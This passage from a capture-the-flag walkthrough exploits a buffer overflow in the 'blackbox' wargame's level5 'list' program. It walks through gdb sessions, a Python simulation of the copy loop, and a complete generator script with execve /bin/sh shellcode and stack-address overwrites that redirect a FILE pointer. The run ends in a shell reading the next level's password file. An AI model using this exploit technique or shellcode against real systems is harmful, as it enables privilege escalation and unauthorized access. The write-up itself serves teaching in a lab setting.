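    mem = bytearray(EBP - BUF)            # models the stack from buf up to ebp

    def rd(addr):
        return struct.unpack_from("<L", mem, addr - BUF)[0]

    def wr(addr, value):
        struct.pack_into("<L", mem, addr - BUF, value)

    mem[:len(chunk)] = chunk              # fread fills buf ...
    wr(LEN, len(chunk))                   # ... and returns the byte count
    wr(FP, 0x11111111)                    # placeholder for the real fp
    wr(PTR, ptr_start)
    wr(I, 0)
    while rd(I) < rd(LEN):
        mem[rd(PTR) - BUF] = mem[rd(I)]   # *ptr = buf[i]
        wr(PTR, rd(PTR) + 1)              # ptr++
        wr(I, rd(I) + 1)                  # i++
    return {"len": rd(LEN), "fp": rd(FP), "ptr": rd(PTR), "i": rd(I)}

tail = struct.pack("<L", 0x02020270)      # steps 1 and 2
tail += struct.pack("<L", FIXEDBUF)       # step 3
tail += struct.pack("<L", I + 2)[:1]      # step 4: low byte only
tail += b"\x03"                           # step 5
state = simulate_last_cycle(b"\x90" * 40 + tail)
for name in ("len", "fp", "ptr", "i"):
    print("%-3s = 0x%08x" % (name, state[name]))
```

In this model the loop exits with fp equal to fixedbuf and with i larger than len, which is the state we want just before the next fread.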
Between the beginning and the end, we need to fill the space with something.

The only open question left is - what is ebp?
Let's take a look:
level5@blackbox:~$ gdb list
...
(gdb) break main
Breakpoint 1 at 0x8048216
(gdb) run
Starting program: /home/level5/list 

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd8f8

Well, this means that we need to overwrite fp with ebp-0x2878=0xbfffb080.
This is not good, because 0xbfffb080 contains the byte 0xff, which we cannot write.
This pretty much closes the lid on everything we were planning so far, because the basic premise of the entire strategy is that we can redirect fp to our own file structure.
However, we should not abandon all hope, because we have the power to make the stack begin much lower by simply feeding some very long argument to the program. Let's see how this works:
(gdb) run `python -c "print 'a'*0x100"`
Starting program: /home/level5/list `python -c "print 'a'*0x100"`

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd7f8
This address is lower by 0x100 bytes than ebp when running without parameters. Let's try again now with an even larger number:
(gdb) run `python -c "print 'a'*0x10000"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level5/list `python -c "print 'a'*0x10000"`

Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$2 = (void *) 0xbffed8f8
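Bingo! With this ebp, fixedbuf sits at ebp-0x2878=0xbffeb080, which no longer contains 0xff. The same ebp will hold outside gdb, for reasons I'll go into in a pending article. Suffice it to say that when running list inside gdb we have argv[0]=/home/level5/list (see the "Starting program" line above), and when running ~/list from /tmp we also have argv[0]=/home/level5/list, so the two are the same.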
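The byte check can be scripted too. The sketch below assumes the forbidden values are just 0x00, 0x01 and 0xff, which is all this part of the walkthrough states; the real set may be larger. The function names are invented for the example.

```python
import struct

FORBIDDEN = {0x00, 0x01, 0xff}   # assumption: only the values ruled out above

def fixedbuf_for(ebp):
    """Address of fixedbuf for a given ebp of main."""
    return ebp - 0x2878

def bad_bytes(addr, forbidden=FORBIDDEN):
    """Forbidden byte values found in a 32-bit little-endian address."""
    return sorted(set(struct.pack("<L", addr)) & forbidden)

# The two ebp values observed in gdb: no argument, and a 0x10000-byte argument.
for ebp in (0xbfffd8f8, 0xbffed8f8):
    addr = fixedbuf_for(ebp)
    print(hex(ebp), "->", hex(addr), [hex(b) for b in bad_bytes(addr)])
```

The same check can be pointed at any other address that has to be written in full into the file.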

Well, now that we have all our constants and strategies settled down, we can generate the input file. I like using scripts:
level5@blackbox:~$ cd /tmp/
level5@blackbox:/tmp$ cat > genfile.py
import struct
EBP = 0xbffed8f8
FIXEDBUF = EBP - 0x2878
I = EBP - 0x8
PTR1 = FIXEDBUF + 0x98
PTR2 = FIXEDBUF + 0xbc
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x08080808)
FILE += '\x90' * 0x90
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * 0x20
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (10340 - len(FILE))
FILE += struct.pack("<L", 0x02020270)
FILE += struct.pack("<L", FIXEDBUF)
FILE += struct.pack("<L", I + 2)[0]
FILE += '\x03'

f = open('somefile', 'wb')
f.write(FILE)
f.close()

level5@blackbox:/tmp$ python genfile.py
Let's give it a shot:
level5@blackbox:/tmp$ ~/list `python -c "print 'a'*0x10000"`
sh-3.1$ cat /home/level6/password
???????????????
And we're done!